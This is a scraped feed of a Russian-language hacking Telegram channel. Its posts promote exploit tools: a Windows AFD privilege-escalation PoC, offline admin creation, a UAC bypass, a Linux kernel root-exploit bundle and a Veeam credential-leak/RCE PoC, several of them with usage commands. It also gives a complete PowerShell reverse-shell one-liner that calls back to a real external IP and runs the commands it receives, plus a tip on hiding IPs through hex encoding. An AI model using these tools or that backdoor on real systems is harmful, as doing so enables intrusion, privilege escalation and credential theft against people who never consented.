CVE-2023-21768 Local Privilege Escalation
Windows 11 22H2
POC exploit
*
usage:
#windows #lpe
Windows 11 22H2
POC exploit
*
usage:
Windows_AFD_LPE_CVE-2023-21768.exe <pid>
где <pid> это id процесса который нужно повысить до system#windows #lpe
😱10👍3🔥2
Offline создание администратора Windows 10? 😈
Ога
Всё через встроенные DLL-файлы offlinelsa и offlinesam. Официально, но не очень документировано.
OfflineAddAdmin2 (это новая версия)
Видео туториал
Ога
Всё через встроенные DLL-файлы offlinelsa и offlinesam. Официально, но не очень документировано.
OfflineAddAdmin2 (это новая версия)
Видео туториал
😱9🔥2👍1
PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно.
Тупо бэкдор!
usage:
Тупо бэкдор!
usage:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"🔥34😱9👍5
UAC bypass for x64 Windows 7 - 11
Понятно
iscsicpl.exe уязвим к перехвату порядка поиска DLL при запуске 32-битного бинарного файла Microsoft на 64-битном хосте через SysWOW64.
Понятно
iscsicpl.exe уязвим к перехвату порядка поиска DLL при запуске 32-битного бинарного файла Microsoft на 64-битном хосте через SysWOW64.
😱7👍1
kernel-linux-factory
*
Удобно тем, что не нужно компилировать или настраивать среду, глянул какое ядро, запустил сплоет, получилпо морде #root
*
в составе exploits для:
CVE-2016-9793
4-20-BPF-integer
CVE-2017-5123
CVE-2017-6074
CVE-2017-7308
CVE-2017-8890
CVE-2017-11176
CVE-2017-16995
CVE-2017-1000112
CVE-2018-5333
CVE-2019-9213 & CVE-2019-8956
CVE-2019-15666
CVE-2020-8835
CVE-2020-27194
CVE-2021-3156
CVE-2021-31440
CVE-2021-3490
CVE-2021-22555
CVE-2021-41073
CVE-2021-4154
CVE-2021-42008
CVE-2021-43267
CVE-2022-0185
CVE-2022-0847
CVE-2022-0995
CVE-2022-1015
CVE-2022-2588
CVE-2022-2639
CVE-2022-25636
CVE-2022-27666
CVE-2022-32250
CVE-2022-34918
download
#linux #exploits #kernel
*
Удобно тем, что не нужно компилировать или настраивать среду, глянул какое ядро, запустил сплоет, получил
*
в составе exploits для:
CVE-2016-9793
4-20-BPF-integer
CVE-2017-5123
CVE-2017-6074
CVE-2017-7308
CVE-2017-8890
CVE-2017-11176
CVE-2017-16995
CVE-2017-1000112
CVE-2018-5333
CVE-2019-9213 & CVE-2019-8956
CVE-2019-15666
CVE-2020-8835
CVE-2020-27194
CVE-2021-3156
CVE-2021-31440
CVE-2021-3490
CVE-2021-22555
CVE-2021-41073
CVE-2021-4154
CVE-2021-42008
CVE-2021-43267
CVE-2022-0185
CVE-2022-0847
CVE-2022-0995
CVE-2022-1015
CVE-2022-2588
CVE-2022-2639
CVE-2022-25636
CVE-2022-27666
CVE-2022-32250
CVE-2022-34918
download
#linux #exploits #kernel
👍22🔥3😱1
CVE-2023-27532
Да, опять Veeam Backup & Replication
Утечка учёток в виде открытого текста, либо выполнение удаленного выполнения команды.
*
Аналитика
*
POC exploit
*
usage:
Да, опять Veeam Backup & Replication
Утечка учёток в виде открытого текста, либо выполнение удаленного выполнения команды.
*
Аналитика
*
POC exploit
*
usage:
VeeamHax.exe --target 192.168.0.100
илиVeeamHax.exe --target 192.168.0.100 --cmd calc.exe
#veeam #rce #leakPass🔥12👍6
Время добрых дел.
Многие знают, есть такой клёвый юзер xss.is yashechka
Он генерирует тонны крайне полезного хакерского контента, переводит западный контент, записывает ролики (в том числе и обучающие), лепит красивые pdf - и все это в 99.9 % бесплатно и для людей.
Но случилась беда. И yashechka вот вот останется без глаз, в прямом смысле слова. Зрение yashechka терял давно, болезнь прогрессирует и сейчас на стадии "еще немного и глаза откажут".
Все это крайне страшно и этого хотелось бы избежать. Поэтому yashechka всё таки смог написать пост на xss.is с призывом о помощи:
S.M.E. - Прошу руку помощи у форумчан
Там Вы найдете историю как так вышло, как он остался без работы потому что ослеп, как болезнь прогрессирует и реквизиты по которым можно оказать помощь.
*
Наш канал не пройдет мимо и тоже окажет помощь.
Многие знают, есть такой клёвый юзер xss.is yashechka
Он генерирует тонны крайне полезного хакерского контента, переводит западный контент, записывает ролики (в том числе и обучающие), лепит красивые pdf - и все это в 99.9 % бесплатно и для людей.
Но случилась беда. И yashechka вот вот останется без глаз, в прямом смысле слова. Зрение yashechka терял давно, болезнь прогрессирует и сейчас на стадии "еще немного и глаза откажут".
Все это крайне страшно и этого хотелось бы избежать. Поэтому yashechka всё таки смог написать пост на xss.is с призывом о помощи:
S.M.E. - Прошу руку помощи у форумчан
Там Вы найдете историю как так вышло, как он остался без работы потому что ослеп, как болезнь прогрессирует и реквизиты по которым можно оказать помощь.
*
Наш канал не пройдет мимо и тоже окажет помощь.
👍57😱23🔥6
Бывает полезно скрыть ip через hex/decimal преобразование
windows\linux\browser - работает везде
*
вот вам 2 варианта, и bash и powershell
windows\linux\browser - работает везде
*
вот вам 2 варианта, и bash и powershell
😱5